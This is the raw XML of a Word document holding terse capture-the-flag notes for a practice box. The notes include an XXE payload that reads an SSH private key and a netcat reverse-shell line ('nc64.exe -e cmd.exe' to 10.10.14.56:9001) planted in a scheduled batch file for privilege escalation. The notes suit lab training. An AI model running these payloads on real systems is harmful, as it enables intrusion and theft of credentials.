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7B3D3DBC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0077E5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Markup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666E25D8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8B7A81">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> nmap -sC -sV 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116E8681" w:rsidR="00843DCE" w:rsidRDefault="00F64E0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admin and password for default credentials </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3220E83B" w14:textId="16447499" w:rsidR="001A3A38" w:rsidRDefault="001A3A3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obtain the request for order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB17E1C" w14:textId="04668872" w:rsidR="001A3A38" w:rsidRDefault="001A3A3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try to find bugs via google with hacktricks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F03F339" w14:textId="19D8F253" w:rsidR="001A3A38" w:rsidRDefault="001A3A3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just try to modified it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36ABBACB" w14:textId="07D6B3AA" w:rsidR="001A3A38" w:rsidRDefault="001A3A3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&lt;! DOCTYPE root [&lt;!ENTITY test SYSTEM </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="008064D6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>file://c:/users/deniel/..sh/id_rsa</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt; ]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58561F3C" w14:textId="523D3883" w:rsidR="001A3A38" w:rsidRDefault="001A3A3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team </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F3D05D" w14:textId="2ACBACFA" w:rsidR="001A3A38" w:rsidRDefault="001A3A3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&amp;test;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD6515D" w14:textId="06B303AD" w:rsidR="00B94348" w:rsidRDefault="00B9434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response we obtain the id_rsa key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F72D72" w14:textId="5E74C9E1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02573698" w14:textId="77777777" w:rsidR="00404CA3" w:rsidRDefault="00404CA3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1E9A32B2" w14:textId="2F5408CB" w:rsidR="00404CA3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0C2A148D" w14:textId="417EE224" w:rsidR="00843DCE" w:rsidRDefault="00B60A9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 need to shell its ssh so we can easily obtain it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6FA1B0" w14:textId="77777777" w:rsidR="00B60A99" w:rsidRDefault="00B60A99" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3367FF2D" w14:textId="77777777" w:rsidR="00B60A99" w:rsidRDefault="00B60A99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104F1000" w14:textId="77777777" w:rsidR="00B60A99" w:rsidRDefault="00B60A99" w:rsidP="00B60A9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terminal </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44258353" w14:textId="77777777" w:rsidR="00B60A99" w:rsidRDefault="00B60A99" w:rsidP="00B60A9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Vi id_rsa and paste there</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2BF140" w14:textId="77777777" w:rsidR="00B60A99" w:rsidRDefault="00B60A99" w:rsidP="00B60A9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Sudo chmod 400 id_rsa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D305E2" w14:textId="77777777" w:rsidR="00B60A99" w:rsidRDefault="00B60A99" w:rsidP="00B60A9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Ssh -I id_rsa daniel@ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08957CA8" w14:textId="77777777" w:rsidR="00B60A99" w:rsidRDefault="00B60A99" w:rsidP="00B60A9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 WINDOWS CAT = type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DBEC6E" w14:textId="77777777" w:rsidR="00B60A99" w:rsidRDefault="00B60A99" w:rsidP="00B60A9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get user.txt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B0D8307" w14:textId="77777777" w:rsidR="00B60A99" w:rsidRDefault="00B60A99" w:rsidP="00B60A9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 WINDOWS CAT = type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20684B08" w14:textId="77777777" w:rsidR="00B60A99" w:rsidRPr="00404CA3" w:rsidRDefault="00B60A99" w:rsidP="00B60A9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logmanager in c drive of windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C13412E" w14:textId="77777777" w:rsidR="00B60A99" w:rsidRPr="00404CA3" w:rsidRDefault="00B60A99" w:rsidP="00B60A99">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00404CA3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Wget http:// github/int0x33/nc.exe/blob/master/cd64.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B8624B" w14:textId="77777777" w:rsidR="00B60A99" w:rsidRDefault="00B60A99" w:rsidP="00B60A9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Start the python server as </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619FB641" w14:textId="77777777" w:rsidR="00B60A99" w:rsidRDefault="00B60A99" w:rsidP="00B60A9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Python3 -m http.server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471FC1BE" w14:textId="77777777" w:rsidR="00B60A99" w:rsidRDefault="00B60A99" w:rsidP="00B60A9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 try to obtain it as</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28585F9B" w14:textId="77777777" w:rsidR="00B60A99" w:rsidRDefault="00B60A99" w:rsidP="00B60A9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Wget </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="008064D6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://10.10.14.56:8000/nc64.exe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-outfile nc64.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E805258" w14:textId="7A4E9B96" w:rsidR="00843DCE" w:rsidRDefault="005B68F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Echo C:\Log-management/nc64.exe -e cmd.exe 10.10.14.56 9001 &gt; c:\Log-management\job.bat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32843346" w14:textId="0FA91185" w:rsidR="00532A55" w:rsidRDefault="00532A5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Nc -lvnp 9001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61040A76" w14:textId="77777777" w:rsidR="00DC4A9D" w:rsidRDefault="00DC4A9D" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D1F5ADB" w14:textId="214D8C17" w:rsidR="00DC4A9D" w:rsidRDefault="00DC4A9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Type C:\Users\Administrator\Desktop</w:t>
      </w:r>
      <w:r w:rsidR="00E34106">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>root.txt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077E5"/>
    <w:rsid w:val="00046EBE"/>
    <w:rsid w:val="000C3180"/>
    <w:rsid w:val="0019099F"/>
    <w:rsid w:val="001A3A38"/>
    <w:rsid w:val="00354F85"/>
    <w:rsid w:val="0039621D"/>
    <w:rsid w:val="003C3888"/>
    <w:rsid w:val="00404CA3"/>
    <w:rsid w:val="00427E37"/>
    <w:rsid w:val="00532A55"/>
    <w:rsid w:val="005B68F1"/>
    <w:rsid w:val="00835B9C"/>
    <w:rsid w:val="00843DCE"/>
    <w:rsid w:val="008B7A81"/>
    <w:rsid w:val="009257AE"/>
    <w:rsid w:val="00A104B9"/>
    <w:rsid w:val="00A311DF"/>
    <w:rsid w:val="00A5666B"/>
    <w:rsid w:val="00B500E5"/>
    <w:rsid w:val="00B60A99"/>
    <w:rsid w:val="00B618CB"/>
    <w:rsid w:val="00B94348"/>
    <w:rsid w:val="00CE6AFB"/>
    <w:rsid w:val="00DC4A9D"/>
    <w:rsid w:val="00E34106"/>
    <w:rsid w:val="00F578D1"/>
    <w:rsid w:val="00F6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A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A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0.10.14.56:8000/nc64.exe" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file://c:/users/deniel/..sh/id_r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18</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-25T12:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-13T12:42:00Z</dcterms:modified>
</cp:coreProperties>
</file>